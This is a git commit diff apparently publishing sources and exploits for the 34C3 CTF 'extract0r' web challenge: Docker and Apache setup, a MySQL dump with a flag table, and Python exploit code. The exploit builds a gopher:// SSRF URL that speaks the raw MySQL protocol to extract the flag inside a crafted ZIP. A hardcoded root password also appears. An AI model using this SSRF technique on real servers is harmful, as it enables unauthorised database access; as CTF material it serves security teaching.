initial commit

Author: eboda

.gitignore

@@ -0,0 +1,3 @@
+*.pyc
+__pycache__
+*.sqlite3

README.md

@@ -1,2 +1,14 @@
-# 34c3ctf
-Challenge Sources & Exploits for the 34C3 CTF
+# Challenge Sources & Exploits for the 34C3 CTF
+
+Challenges:
+
+* minbashmaxfun - misc 
+* urlstorage - web 
+* extract0r - web
+
+Junior Challenges:
+* cyberms - crypto
+* megalal - crypto
+* babybash - misc
+* pizzagate - web
+* quaker - web

extract0r/000-default.conf

@@ -0,0 +1,59 @@
+<VirtualHost *:80>
+        # The ServerName directive sets the request scheme, hostname and port that
+        # the server uses to identify itself. This is used when creating
+        # redirection URLs. In the context of virtual hosts, the ServerName
+        # specifies what hostname must appear in the request's Host: header to
+        # match this virtual host. For the default virtual host (this file) this
+        # value is not decisive as it is used as a last resort host regardless.
+        # However, you must set it for any further virtual host explicitly.
+        #ServerName www.example.com
+
+
+        ServerAdmin webmaster@localhost
+        DocumentRoot /var/www/html
+        php_admin_flag engine off
+
+        <Location /index.php>
+            AllowOverride None
+            Require all granted
+            php_admin_flag engine on
+        </Location>
+
+        <Directory /var/www/html>
+            Options -Indexes 
+            AllowOverride None
+            Require all granted
+            php_admin_flag engine off
+        </Directory>
+
+        <Directory /var/www/html/files/>
+            Options -Indexes 
+            AllowOverride None
+            Require all granted
+            php_admin_flag engine off
+        </Directory>
+
+        <Directory /var/www/html/files/*/>
+            Options Indexes FollowSymLinks
+            AllowOverride None
+            Require all granted
+            php_admin_flag engine off
+        </Directory>
+
+        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
+        # error, crit, alert, emerg.
+        # It is also possible to configure the loglevel for particular
+        # modules, e.g.
+        #LogLevel info ssl:warn
+
+        ErrorLog ${APACHE_LOG_DIR}/error.log
+        CustomLog ${APACHE_LOG_DIR}/access.log combined
+
+        # For most configuration files from conf-available/, which are
+        # enabled or disabled at a global level, it is possible to
+        # include a line for only one particular virtual host. For example the
+        # following line enables the CGI configuration for this host only
+        # after it has been globally disabled with "a2disconf".
+        #Include conf-available/serve-cgi-bin.conf
+</VirtualHost>
+

extract0r/Dockerfile

@@ -0,0 +1,32 @@
+FROM ubuntu:17.10
+
+RUN bash -c "debconf-set-selections <<< 'mysql-server mysql-server/root_password password FUCKmyL1f3AZiwqecq'"
+RUN bash -c "debconf-set-selections <<< 'mysql-server mysql-server/root_password_again password FUCKmyL1f3AZiwqecq'"
+
+RUN apt-get -y update && apt-get -y install curl wget zip 
+
+# apache & php & stuff
+RUN apt-get -y install apache2 apt-transport-https curl wget zip php php-curl php-pclzip libapache2-mod-php mysql-server php-mysql p7zip-full vim-common cron
+
+ENV WEBROOT /var/www/html
+ENV MYSQL_USER=mysql
+RUN rm /var/www/html/index.html
+
+ADD mysqld.cnf /etc/mysql/mysql.conf.d/mysqld.cnf
+
+ADD dump.sql /tmp/
+RUN service mysql start; mysql -u root -pFUCKmyL1f3AZiwqecq < /tmp/dump.sql && rm /tmp/dump.sql
+
+# challenge files and configs
+RUN (crontab -l ; echo "*/5 * * * * rm -r /var/www/html/files/* ; touch /var/www/html/files/index.php";\
+        echo "*/5 * * * * rm -r /tmp/* && touch /tmp/index.php") | crontab -
+ADD 000-default.conf /etc/apache2/sites-enabled/000-default.conf
+ADD webroot/ /var/www/html/
+RUN touch /tmp/index.php
+RUN useradd extract0r -m
+ADD files/create_a_backup_of_my_supersecret_flag.sh /home/extract0r/
+RUN chown -R www-data /var/www/html/files && \
+    chown extract0r:extract0r /home/extract0r/create_a_backup_of_my_supersecret_flag.sh
+
+
+CMD service mysql start; service cron start; echo 'INSERT INTO flag.flag VALUES("34C3_you_Extr4cted_the_unExtract0ble_plUs_you_knoW_s0me_SSRF");' | mysql -u root -pFUCKmyL1f3AZiwqecq; service apache2 start;  /bin/bash

extract0r/README.md

@@ -0,0 +1,6 @@
+# extract0r - web - medium
+
+> Found this great new extraction service. Enjoy!
+
+> Difficulty: medium
+

extract0r/build_docker.sh

@@ -0,0 +1,2 @@
+#!/bin/bash
+docker build -t eboda/extract0r .

extract0r/dump.sql

@@ -0,0 +1,12 @@
+CREATE DATABASE  IF NOT EXISTS `flag` /*!40100 DEFAULT CHARACTER SET utf8 */;
+USE `flag`;
+
+DROP TABLE IF EXISTS `flag`;
+CREATE TABLE `flag` (
+  `flag` VARCHAR(100)
+);
+
+
+CREATE USER 'm4st3r_ov3rl0rd'@'localhost';
+GRANT USAGE ON *.* TO 'm4st3r_ov3rl0rd'@'localhost';
+GRANT SELECT ON `flag`.* TO 'm4st3r_ov3rl0rd'@'localhost';

extract0r/exploit/__init__.py

@@ -0,0 +1,51 @@
+#!/bin/bash
+
+import struct 
+import zip_tools
+from binascii import hexlify
+
+
+# make a 100 dummy character string
+# we will rpad flag to 100 characters (this is needed since actual flag length is unknown, you
+# could just bruteforce it tohugh i guess...)
+flag_dummy = b"B"*100
+
+payload = zip_tools.create_zip(b"gimme_flag", flag_dummy)
+# print(''.join(map(chr,payload)))
+# exit()
+
+prefix = bytes(payload.split(flag_dummy)[0])
+suffix = bytes(payload.split(flag_dummy)[1])
+
+
+sql_cmd = b"select concat(cast(0x" + hexlify(prefix) + b" as binary), rpad(flag, 100, 'A'), cast(0x" + hexlify(suffix) + b" as binary)) from flag.flag-- -"
+
+auth = bytearray([
+    0x48, 0x0, 0x0,     # length
+    0x1,                # seqid
+    0x85, 0xa6, 0x3f, 0x20, 0, 0, 0, 0x1, 0x21, 0, 0,
+    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
+    0, 0, 0, 0, 0
+] + list(b'm4st3r_ov3rl0rd') + [      # mysql user
+    0, 0,               # pass length & pass
+] + list(b'mysql_native_password') + [
+    0, 0,
+])
+
+
+def make_cmd(cmd):
+    length = struct.pack("<I", len(cmd) + 2)[:3]
+
+    return length + bytearray([
+        0x0,         # seqid
+        0x3,   # select query
+    ]) + cmd
+def encode(s):
+    return ''.join(map(lambda x: "%{:02x}".format(x), list(s)))
+
+
+print((b"gopher://foo@[cafebabe.cf]@yolo.com:3306/A" + bytes(encode(auth + make_cmd(sql_cmd) + b"FOOOOOOOOOOOOBAR"),"utf-8")).decode())
+
+
+
+

extract0r/exploit/exploit.py

@@ -0,0 +1,65 @@
+eocd_sig = b"\x50\x4b\x05\x06"
+cd_fh_sig = b"\x50\x4b\x01\x02"
+local_fh_sig = b"\x50\x4b\x03\x04"
+from struct import pack
+
+
+
+def create_zip(name, data):
+    local_fh = zip_local_fileheader(len(name), name, len(data), len(data), data)
+    cd_fh = zip_cd_fileheader(len(name), name, len(data), len(data), 0)
+    eocd = zip_eocd(len(local_fh) , len(cd_fh))
+    return local_fh + cd_fh + eocd
+
+
+def zip_eocd(cd_offset, cd_size, disk_no=0, disk_no_cd=0, disk_entries=1, total_entries=1, comment_len=0, comment=b""):
+    return eocd_sig + pack("<HHHHIIH",
+            disk_no,
+            disk_no_cd,
+            disk_entries,
+            total_entries,
+            cd_size,
+            cd_offset,
+            comment_len) + comment
+
+
+def zip_cd(list_file_headers):
+    res = "";
+    for file_header in list_file_headers:
+        res += file_header
+    return res
+
+
+def zip_cd_fileheader(file_name_len,file_name,compressed_size, uncompressed_size, local_header_offset,  version=0x31e, version_needed=0xa, flags=0, compression=0, crc32=0, modtime=0, moddate=0,  extra_field_len=0, file_comment_len=0, disk_start=0, internal_attr=0,external_attr=0, extra_field=b"", file_comment=b""):
+    return cd_fh_sig + pack("<HHHHHHIIIHHHHHII",
+            version,
+            version_needed,
+            flags,
+            compression,
+            modtime,
+            moddate,
+            crc32,
+            compressed_size,
+            uncompressed_size,
+            file_name_len,
+            extra_field_len,
+            file_comment_len,
+            disk_start,
+            internal_attr,
+            external_attr,
+            local_header_offset) + file_name + extra_field + file_comment
+
+def zip_local_fileheader(file_name_len, file_name, compressed_size, uncompressed_size, data, version=0xa, flags=0, compression=0, modtime=0, moddate=0, crc32=0, extra_field_len=0, extra_field=b""):
+        return local_fh_sig + pack("<HHHHHIIIHH",
+                version,
+                flags,
+                compression,
+                modtime,
+                moddate,
+                crc32,
+                compressed_size,
+                uncompressed_size,
+                file_name_len,
+                extra_field_len) + file_name + extra_field + data
+
+